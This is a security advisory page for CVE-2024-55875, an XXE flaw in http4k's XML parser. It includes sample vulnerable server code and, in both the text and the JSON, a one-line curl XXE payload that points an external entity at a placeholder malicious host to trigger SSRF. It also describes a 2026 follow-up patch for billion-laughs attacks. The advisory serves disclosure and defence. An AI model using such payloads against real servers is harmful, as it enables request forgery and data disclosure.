GHSA-7MJ5-HJJJ-8RGW

Vulnerability from github – Published: 2024-12-12 19:22 – Updated: 2026-06-09 10:42
VLAI
Summary
http4k has a potential XXE (XML External Entity Injection) vulnerability
Details

Summary

Short summary of the problem. Make the impact and severity as clear as possible. For example: An unsafe deserialization vulnerability allows any unauthenticated user to execute arbitrary code on the server.

There is a potential XXE(XML External Entity Injection) vulnerability when http4k handling malicious XML contents within requests, which might allow attackers to read local sensitive information on server, trigger Server-side Request Forgery and even execute code under some circumstances.

Details

Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer. https://github.com/http4k/http4k/blob/25696dff2d90206cc1da42f42a1a8dbcdbcdf18c/core/format/xml/src/main/kotlin/org/http4k/format/Xml.kt#L42-L46 XML contents is parsed with DocumentBuilder without security settings on or external entity enabled

PoC

Complete instructions, including specific configuration details, to reproduce the vulnerability.

Example Vulnerable server code:

import org.http4k.core.*
import org.http4k.format.Xml.xml
import org.http4k.server.Netty
import org.http4k.server.asServer
import org.w3c.dom.Document

fun main() {

    val xmlLens = Body.xml().toLens()

    // Create an HTTP handler
    val app: HttpHandler = { request ->
        try {
            // Parse the incoming XML payload to a Document object
            val xmlDocument: Document = xmlLens(request)

            // Extract root element name or other details from the XML
            val rootElementName = xmlDocument.documentElement.nodeName

            // Create a response XML based on the extracted information
            val responseXml = """
                <response>
                    <message>Root element is: $rootElementName</message>
                </response>
            """.trimIndent()

            // Respond with XML
            Response(Status.OK).body(responseXml).header("Content-Type", "application/xml")
        } catch (e: Exception) {
            // Handle invalid XML or other errors
            Response(Status.BAD_REQUEST).body("Invalid XML: ${e.message}")
        }
    }

    // Start the server
    val server = app.asServer(Netty(9000)).start()
    println("Server started on http://localhost:9000")
}

Maven dependency:

<dependencies>
        <dependency>
            <groupId>org.jetbrains.kotlin</groupId>
            <artifactId>kotlin-test-junit5</artifactId>
            <version>1.9.0</version>
            <scope>test</scope>
        </dependency>
        <dependency>
            <groupId>org.junit.jupiter</groupId>
            <artifactId>junit-jupiter-engine</artifactId>
            <version>5.10.0</version>
            <scope>test</scope>
        </dependency>
        <dependency>
            <groupId>org.jetbrains.kotlin</groupId>
            <artifactId>kotlin-stdlib</artifactId>
            <version>1.9.0</version>
        </dependency>

        <dependency>
            <groupId>org.http4k</groupId>
            <artifactId>http4k-core</artifactId>
            <version>5.40.0.0</version>
        </dependency>

        <!-- Http4k XML format -->
        <dependency>
            <groupId>org.http4k</groupId>
            <artifactId>http4k-format-xml</artifactId>
            <version>5.40.0.0</version>
        </dependency>

        <!-- http4k Netty -->
        <dependency>
            <groupId>org.http4k</groupId>
            <artifactId>http4k-server-netty</artifactId>
            <version>5.40.0.0</version>
        </dependency>
    </dependencies>

Exploit payload example to trigger SSRF

curl -X POST http://localhost:9000 -H "Content-Type: application/xml" -d "<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE root [<!ENTITY xxe SYSTEM \"https://replace.with.your.malicious.website/poc\">]><root>&xxe;</root>"

Impact

What kind of vulnerability is it? Who is impacted? The servers that employ this XML parsing feature of http4k are vulnerable to this XXE vulnerability

Follow-up patch — v6.50.0.0 (May 2026)

The original fix shipped in v5.41.0.0 / v4.50.0.0 closed the documented external-entity attack class (SSRF, local-file disclosure, code execution) by setting ACCESS_EXTERNAL_DTD="", ACCESS_EXTERNAL_SCHEMA="", and isExpandEntityReferences=false on the default DocumentBuilderFactory.

A residual gap remained: the parser still accepted documents containing <!DOCTYPE> declarations even though external entity resolution was blocked. This left open billion-laughs-style internal entity expansion DoS attacks against any application using Body.xml() or Document.asXmlDocument() on untrusted XML.

v6.50.0.0 closes this residual by adding disallow-doctype-decl=true and FEATURE_SECURE_PROCESSING=true to defaultXmlParsingConfig. Any document containing a <!DOCTYPE> is now rejected at parse time.

Follow-up affected & fixed versions

Version Fixed Version
>= 5.41.0.0, < 6.50.0.0 6.50.0.0

v6.x users should upgrade to v6.50.0.0. The patch is part of the v6.50.0.0 release; no separate backport is required for the v6 line. Older v5 / v4 users remain on the v5.41.0.0 / v4.50.0.0 fix (external-entity protection); the billion-laughs residual is fixed in those lines only via http4k EE LTS releases — contact enterprise@http4k.org if you need it.

Follow-up timeline

Date/time (UTC) Notes
31/05/2026 17:12 Follow-up patch merged (commit c0cfaf5d63) with new tests for <!DOCTYPE> rejection and billion-laughs payload rejection
31/05/2026 18:06 http4k v6.50.0.0 released to Maven Central
Severity
9.8 (Critical)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.http4k:http4k-format-xml"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "6.50.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-55875"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-200",
      "CWE-611",
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-12-12T19:22:01Z",
    "nvd_published_at": "2024-12-12T19:15:13Z",
    "severity": "CRITICAL"
  },
  "details": "### Summary\n_Short summary of the problem. Make the impact and severity as clear as possible. For example: An unsafe deserialization vulnerability allows any unauthenticated user to execute arbitrary code on the server._\n\nThere is a potential XXE(XML External Entity Injection) vulnerability when http4k handling malicious XML contents within requests, which might allow attackers to read local sensitive information on server, trigger Server-side Request Forgery and even execute code under some circumstances.\n\n### Details\n_Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer._\nhttps://github.com/http4k/http4k/blob/25696dff2d90206cc1da42f42a1a8dbcdbcdf18c/core/format/xml/src/main/kotlin/org/http4k/format/Xml.kt#L42-L46\nXML contents is parsed with DocumentBuilder without security settings on or external entity enabled\n\n### PoC\n_Complete instructions, including specific configuration details, to reproduce the vulnerability._\n#### Example Vulnerable server code:\n```\nimport org.http4k.core.*\nimport org.http4k.format.Xml.xml\nimport org.http4k.server.Netty\nimport org.http4k.server.asServer\nimport org.w3c.dom.Document\n\nfun main() {\n\n    val xmlLens = Body.xml().toLens()\n\n    // Create an HTTP handler\n    val app: HttpHandler = { request -\u003e\n        try {\n            // Parse the incoming XML payload to a Document object\n            val xmlDocument: Document = xmlLens(request)\n\n            // Extract root element name or other details from the XML\n            val rootElementName = xmlDocument.documentElement.nodeName\n\n            // Create a response XML based on the extracted information\n            val responseXml = \"\"\"\n                \u003cresponse\u003e\n                    \u003cmessage\u003eRoot element is: $rootElementName\u003c/message\u003e\n                \u003c/response\u003e\n            \"\"\".trimIndent()\n\n            // Respond with XML\n            Response(Status.OK).body(responseXml).header(\"Content-Type\", \"application/xml\")\n        } catch (e: Exception) {\n            // Handle invalid XML or other errors\n            Response(Status.BAD_REQUEST).body(\"Invalid XML: ${e.message}\")\n        }\n    }\n\n    // Start the server\n    val server = app.asServer(Netty(9000)).start()\n    println(\"Server started on http://localhost:9000\")\n}\n```\n#### Maven dependency:\n```\n\u003cdependencies\u003e\n        \u003cdependency\u003e\n            \u003cgroupId\u003eorg.jetbrains.kotlin\u003c/groupId\u003e\n            \u003cartifactId\u003ekotlin-test-junit5\u003c/artifactId\u003e\n            \u003cversion\u003e1.9.0\u003c/version\u003e\n            \u003cscope\u003etest\u003c/scope\u003e\n        \u003c/dependency\u003e\n        \u003cdependency\u003e\n            \u003cgroupId\u003eorg.junit.jupiter\u003c/groupId\u003e\n            \u003cartifactId\u003ejunit-jupiter-engine\u003c/artifactId\u003e\n            \u003cversion\u003e5.10.0\u003c/version\u003e\n            \u003cscope\u003etest\u003c/scope\u003e\n        \u003c/dependency\u003e\n        \u003cdependency\u003e\n            \u003cgroupId\u003eorg.jetbrains.kotlin\u003c/groupId\u003e\n            \u003cartifactId\u003ekotlin-stdlib\u003c/artifactId\u003e\n            \u003cversion\u003e1.9.0\u003c/version\u003e\n        \u003c/dependency\u003e\n\n        \u003cdependency\u003e\n            \u003cgroupId\u003eorg.http4k\u003c/groupId\u003e\n            \u003cartifactId\u003ehttp4k-core\u003c/artifactId\u003e\n            \u003cversion\u003e5.40.0.0\u003c/version\u003e\n        \u003c/dependency\u003e\n\n        \u003c!-- Http4k XML format --\u003e\n        \u003cdependency\u003e\n            \u003cgroupId\u003eorg.http4k\u003c/groupId\u003e\n            \u003cartifactId\u003ehttp4k-format-xml\u003c/artifactId\u003e\n            \u003cversion\u003e5.40.0.0\u003c/version\u003e\n        \u003c/dependency\u003e\n\n        \u003c!-- http4k Netty --\u003e\n        \u003cdependency\u003e\n            \u003cgroupId\u003eorg.http4k\u003c/groupId\u003e\n            \u003cartifactId\u003ehttp4k-server-netty\u003c/artifactId\u003e\n            \u003cversion\u003e5.40.0.0\u003c/version\u003e\n        \u003c/dependency\u003e\n    \u003c/dependencies\u003e\n```\n#### Exploit payload example to trigger SSRF\n`curl -X POST http://localhost:9000 -H \"Content-Type: application/xml\" -d \"\u003c?xml version=\\\"1.0\\\" encoding=\\\"UTF-8\\\"?\u003e\u003c!DOCTYPE root [\u003c!ENTITY xxe SYSTEM \\\"https://replace.with.your.malicious.website/poc\\\"\u003e]\u003e\u003croot\u003e\u0026xxe;\u003c/root\u003e\"`\n\n\n### Impact\n_What kind of vulnerability is it? Who is impacted?_\nThe servers that employ this XML parsing feature of http4k are vulnerable to this XXE vulnerability\n\n### Follow-up patch \u2014 v6.50.0.0 (May 2026)\n\nThe original fix shipped in v5.41.0.0 / v4.50.0.0 closed the documented external-entity attack class (SSRF, local-file disclosure, code execution) by setting `ACCESS_EXTERNAL_DTD=\"\"`, `ACCESS_EXTERNAL_SCHEMA=\"\"`, and `isExpandEntityReferences=false` on the default `DocumentBuilderFactory`.\n\nA residual gap remained: the parser still **accepted** documents containing `\u003c!DOCTYPE\u003e` declarations even though external entity resolution was blocked. This left open billion-laughs-style internal entity expansion DoS attacks against any application using `Body.xml()` or `Document.asXmlDocument()` on untrusted XML.\n\n  **v6.50.0.0** closes this residual by adding `disallow-doctype-decl=true` and `FEATURE_SECURE_PROCESSING=true` to `defaultXmlParsingConfig`. Any document containing a `\u003c!DOCTYPE\u003e` is now rejected at parse time.\n\n#### Follow-up affected \u0026 fixed versions\n\n  | Version | Fixed Version |\n  |---------|---------------|\n  | `\u003e= 5.41.0.0, \u003c 6.50.0.0` | **6.50.0.0** |\n\nv6.x users should upgrade to v6.50.0.0. The patch is part of the v6.50.0.0 release; no separate backport is required for the v6 line. Older v5 / v4 users remain on the v5.41.0.0 / v4.50.0.0 fix (external-entity protection); the billion-laughs residual is fixed in those lines only via http4k EE LTS releases \u2014 contact [enterprise@http4k.org](mailto:enterprise@http4k.org) if you need it.\n\n#### Follow-up timeline\n\n  | Date/time (UTC) | Notes |\n  |-----------------|-------|\n  | 31/05/2026 17:12 | Follow-up patch merged (commit [`c0cfaf5d63`](https://github.com/http4k/http4k/commit/c0cfaf5d63)) with new tests for `\u003c!DOCTYPE\u003e` rejection and billion-laughs payload rejection |\n  | 31/05/2026 18:06 | http4k v6.50.0.0 released to Maven Central |",
  "id": "GHSA-7mj5-hjjj-8rgw",
  "modified": "2026-06-09T10:42:52Z",
  "published": "2024-12-12T19:22:01Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/http4k/http4k/security/advisories/GHSA-7mj5-hjjj-8rgw"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-55875"
    },
    {
      "type": "WEB",
      "url": "https://github.com/http4k/http4k/commit/35297adc6d6aca4951d50d8cdf17ff87a8b19fbc"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/http4k/http4k"
    },
    {
      "type": "WEB",
      "url": "https://github.com/http4k/http4k/blob/25696dff2d90206cc1da42f42a1a8dbcdbcdf18c/core/format/xml/src/main/kotlin/org/http4k/format/Xml.kt#L42-L46"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "http4k has a potential XXE (XML External Entity Injection) vulnerability"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.





Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Detection rules are retrieved from Rulezet.